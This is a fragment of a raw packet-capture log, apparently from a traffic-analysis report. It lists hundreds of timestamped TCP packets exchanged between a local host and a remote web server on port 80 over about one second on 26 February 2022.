                                                                    Feb 26, 2022 10:19:52.995398998 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.995440006 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.995462894 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.995500088 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.995542049 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.995570898 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.995604038 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.995647907 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.995661020 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.995701075 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.995723963 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.995754957 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.995775938 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.995822906 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.995836020 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.995871067 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.995894909 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.995935917 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.995982885 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.995994091 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.996035099 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996073008 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996088028 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.996130943 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996176958 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996189117 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.996200085 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.996248007 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996289015 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996305943 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.996337891 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.996365070 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996406078 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996436119 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.996464014 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.996484995 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996526957 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996565104 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996588945 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.996632099 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996645927 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.996685982 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996726990 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996757984 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.996788979 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996808052 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.996853113 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:52.996865988 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:52.997221947 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.099006891 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.099071980 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.099112034 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.099164009 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.099184036 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.099206924 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.099230051 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.099276066 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.099315882 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.099353075 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.099376917 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.099416971 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.099436998 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.099447966 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.099467993 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.099509001 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.099610090 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.099658966 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.099703074 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.099750042 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.099761009 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.099792957 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.099821091 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.099870920 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.099883080 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.099916935 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.099941969 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.099987030 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.197498083 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.197572947 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.197604895 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.197626114 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.197685003 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.197725058 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.197766066 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.197788000 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.197827101 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.197881937 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.197947979 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.198009014 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.198060989 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.198074102 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.198107004 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.198146105 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.198198080 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.198229074 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.198281050 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.198293924 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.198343039 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.198354959 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.198406935 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.198460102 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.198479891 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.198522091 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.198544979 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.198587894 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.198601961 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.198626995 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.198678970 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.198689938 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.198739052 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.198750019 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.198782921 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.198820114 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.198868990 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.198873997 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.198925972 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.198945045 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199003935 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199037075 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199048042 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199081898 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199129105 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199141026 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199181080 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199199915 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199240923 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199258089 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199286938 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199327946 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199371099 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199389935 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199418068 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199450016 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199490070 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199507952 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199539900 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199565887 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199606895 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199625015 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199660063 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199686050 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199733019 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199745893 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199784994 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199803114 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199851036 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199862957 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199898005 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.199922085 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199960947 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.199980021 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.200014114 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.200040102 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.200088024 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.200099945 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.200135946 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.200160980 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.200208902 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.200220108 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.200256109 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.200279951 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.200328112 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.200340033 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.200375080 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.200401068 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.200448036 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.200459003 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.200498104 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.200520992 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.200562000 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.200628042 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.200663090 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.200680971 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.200750113 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.200797081 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.200818062 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.200865984 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.200879097 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.200921059 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.200943947 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.200989008 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.201011896 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.201071024 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.201102018 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.201136112 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.201148033 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.201195002 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.201211929 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.201255083 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.201292992 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.201312065 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.201347113 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.201371908 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.201411963 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.201452971 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.201472044 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.201512098 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.201529980 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.201570034 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.201607943 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.201628923 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.201658010 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.201687098 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.201735973 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.201796055 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.201832056 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.201843023 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.201874018 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.201953888 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202011108 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202024937 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.202063084 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.202085972 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202126026 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202142954 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.202184916 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202233076 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202253103 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.202289104 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.202311993 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202352047 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202387094 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.202409983 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.202429056 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202470064 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202523947 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202543974 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.202584028 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202605963 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.202645063 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202663898 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.202702045 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202721119 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.202769995 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202784061 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.202826023 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.202843904 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202886105 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.202903986 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.202940941 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.202963114 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203022003 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203042030 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.203078032 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.203104019 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203140974 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203164101 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.203213930 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203255892 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.203273058 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.203305960 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203349113 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203389883 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203411102 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.203447104 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.203470945 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203511953 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203527927 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.203562021 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.203584909 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203639984 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.203665018 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203706980 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203727961 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.203767061 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.203787088 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203828096 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203839064 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.203877926 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.203898907 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.203948021 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.270322084 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.301779985 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.301843882 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.301924944 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.301950932 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.301985979 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302022934 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302073002 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302086115 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302124023 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302146912 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302195072 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302207947 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302246094 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302268028 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302315950 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302328110 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302362919 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302388906 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302429914 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302448988 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302484989 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302510023 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302556992 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302570105 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302612066 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302629948 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302676916 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302691936 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302722931 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302751064 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302800894 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302815914 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302849054 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302877903 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302927017 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.302938938 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302974939 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.302999020 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303044081 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303064108 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.303096056 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.303123951 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303165913 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303184032 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.303215981 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.303244114 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303289890 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303303003 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.303334951 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.303361893 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303407907 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303420067 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.303451061 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.303478003 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303518057 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303534985 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.303567886 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.303594112 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303633928 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303652048 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.303684950 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.303709984 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303757906 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303770065 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.303801060 CET4977780192.168.2.580.66.64.174
                                                                    Feb 26, 2022 10:19:53.303828955 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303878069 CET804977780.66.64.174192.168.2.5
                                                                    Feb 26, 2022 10:19:53.303890944 CET4977780192.168.2.580.66.64.174
